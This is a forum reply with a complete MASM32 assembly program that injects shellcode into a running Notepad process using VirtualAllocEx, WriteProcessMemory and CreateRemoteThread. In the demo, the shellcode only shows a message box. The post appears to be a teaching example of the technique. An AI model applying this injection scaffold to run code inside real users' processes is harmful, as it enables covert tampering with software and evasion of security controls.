能力值:
![]()
(RANK:210 )
|
-
-
2 楼
一个简单的注入,通过hook没听说过
打开记事本程序,运行下面的程序
.
386
.model flat, stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\user32.inc
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib
.data
szCalss db 'Notepad',0
.data?
hWnd dd ?
hProcess dd ?
Pid dd ?
Written dd ?
dwTid dd ?
lpMessageBox dd ?
.const
szMessageBox db 'MessageBoxA',0
szUser32dll db 'User32.dll',0
.code
REMOTE_CODE_START:
_lpMessageBox dd ?
_cap db 'i am coming',0
_text db 'haha',0
Shellcode proc
call @F
@@:
pop ebx
sub ebx,offset @B
push MB_OK
mov eax,offset _cap
add eax,ebx
push eax
mov eax,offset _text
add eax,ebx
push eax
push NULL
call dword ptr [ebx+_lpMessageBox]
ret
Shellcode endp
REMOTE_CODE_END:
start:
invoke GetModuleHandle,addr szUser32dll
mov ebx,eax
invoke GetProcAddress,ebx,addr szMessageBox
mov lpMessageBox,eax
invoke FindWindow,addr szCalss,0
invoke GetWindowThreadProcessId, eax, addr Pid
invoke OpenProcess,PROCESS_CREATE_THREAD or PROCESS_VM_WRITE+\
PROCESS_VM_OPERATION,FALSE,Pid
mov hProcess, eax
invoke VirtualAllocEx,hProcess,NULL, REMOTE_CODE_END-REMOTE_CODE_START, MEM_COMMIT, PAGE_EXECUTE_READWRITE
mov hWnd, eax
invoke WriteProcessMemory, hProcess, hWnd, offset REMOTE_CODE_START, REMOTE_CODE_END-REMOTE_CODE_START, addr Written
invoke WriteProcessMemory,hProcess,hWnd,offset lpMessageBox,sizeof dword,addr Written
mov eax,hWnd
add eax,Shellcode-REMOTE_CODE_START
invoke CreateRemoteThread, hProcess, 0, 0, eax, 0, 0, 0
invoke ExitProcess, 0
end start
|
